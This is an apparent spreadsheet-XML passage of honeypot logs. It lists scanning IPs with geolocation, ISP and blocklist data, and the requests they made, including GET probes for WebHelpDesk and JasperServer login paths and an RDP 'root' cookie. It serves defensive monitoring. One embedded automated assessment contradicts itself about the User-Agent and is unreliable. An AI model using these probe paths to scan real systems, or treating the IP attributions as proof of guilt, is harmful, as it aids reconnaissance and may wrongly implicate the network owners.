'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.63.23', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.79.122', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '77.91.74.218', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.40.123', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.113.68.70', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '91.194.11.82', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.234.67.80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.182.38.84', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.118.29', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.116.162', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.255.123.181', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '203.29.241.98', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '209.145.61.177', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.118.29', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.118.29', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_RDP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9b4:8c05"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="862"/>
    <x v="862"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T10:07:08"/>
    <d v="2025-02-18T16:14:09"/>
    <d v="2025-04-25T10:07:08"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_IMAP_HC1"/>
    <s v="3389&amp;&amp;143&amp;&amp;80&amp;&amp;23&amp;&amp;5900&amp;&amp;110&amp;&amp;389&amp;&amp;443"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="BE"/>
    <s v="Berlin"/>
    <s v="NA"/>
    <s v="Berlin (Bezirk Treptow-Köpenick)"/>
    <s v="2950159"/>
    <s v="12489"/>
    <s v="52.4286"/>
    <s v="13.531600000000001"/>
    <s v="208843"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="business"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="2005-09-07"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;command&amp;&amp;stshash"/>
    <s v="{Data_RDP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '103.113.68.70', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '144.126.148.5', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c2bb:b024"/>
    <s v="C-I"/>
    <s v="high&amp;&amp;medium&amp;&amp;low"/>
    <s v="Low"/>
    <s v="This log entry suggests a GET request was made to the IP address 144.126.148.5 from an unknown browser (Mozilla/5.0) likely on a Windows machine, indicating potential unauthorized access or scanning activity. The User-Agent string is fake and often used by malicious bots to hide their true identity. &amp;&amp; A GET request was made to the root directory of a server with an unusual IP address, suggesting a potential scanning or reconnaissance attempt by an attacker. The user agent string is legitimate but may be spoofed. The connection appears to be persistent."/>
    <s v="Scanning GET &amp;&amp; Port Scan _x000a_Web Scanner"/>
  </r>
  <r>
    <x v="863"/>
    <x v="863"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T09:16:43"/>
    <d v="2025-04-24T05:39:48"/>
    <d v="2025-04-25T09:16:43"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="26"/>
    <s v="Busan"/>
    <s v="Buk-gu"/>
    <s v="Mandeok-dong"/>
    <s v="8692398"/>
    <s v="616-110"/>
    <s v="35.2138"/>
    <s v="129.039"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b15:330d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="864"/>
    <x v="864"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T09:03:50"/>
    <d v="2025-02-21T10:49:58"/>
    <d v="2025-04-25T09:03:50"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_H45&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JI"/>
    <s v="East Java"/>
    <s v="Kabupaten Sampang"/>
    <s v="Sampang"/>
    <s v="1628899"/>
    <s v="NA"/>
    <s v="-7.20742"/>
    <s v="113.255"/>
    <s v="139940"/>
    <s v="Dinas Komunikasi dan Informatika Kabupaten Sampang"/>
    <s v="Dinas Komunikasi dan Informatika Kabupaten Sampang"/>
    <s v="business"/>
    <s v="Dinas Komunikasi dan Informatika Kabupaten Sampang"/>
    <s v="2019-12-13"/>
    <s v="IDNIC-SAMPANGKAB-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6792:8406"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="865"/>
    <x v="865"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T08:52:50"/>
    <d v="2024-07-08T23:18:00"/>
    <d v="2025-04-25T08:52:50"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="8510&amp;&amp;23&amp;&amp;46743"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Sujeong-gu)"/>
    <s v="1897000"/>
    <s v="NA"/>
    <s v="37.4224"/>
    <s v="127.102"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2009-02-10"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:70aa:6865"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="866"/>
    <x v="866"/>
    <s v="NA&amp;&amp;59-127-44-65.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-25T07:10:54"/>
    <d v="2024-05-06T11:32:00"/>
    <d v="2025-04-25T07:10:54"/>
    <n v="594"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H18"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;32844&amp;&amp;34407&amp;&amp;34398&amp;&amp;9100&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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7f:2c41"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="867"/>
    <x v="867"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T07:10:20"/>
    <d v="2024-04-05T11:21:00"/>
    <d v="2025-04-25T07:10:20"/>
    <n v="60"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
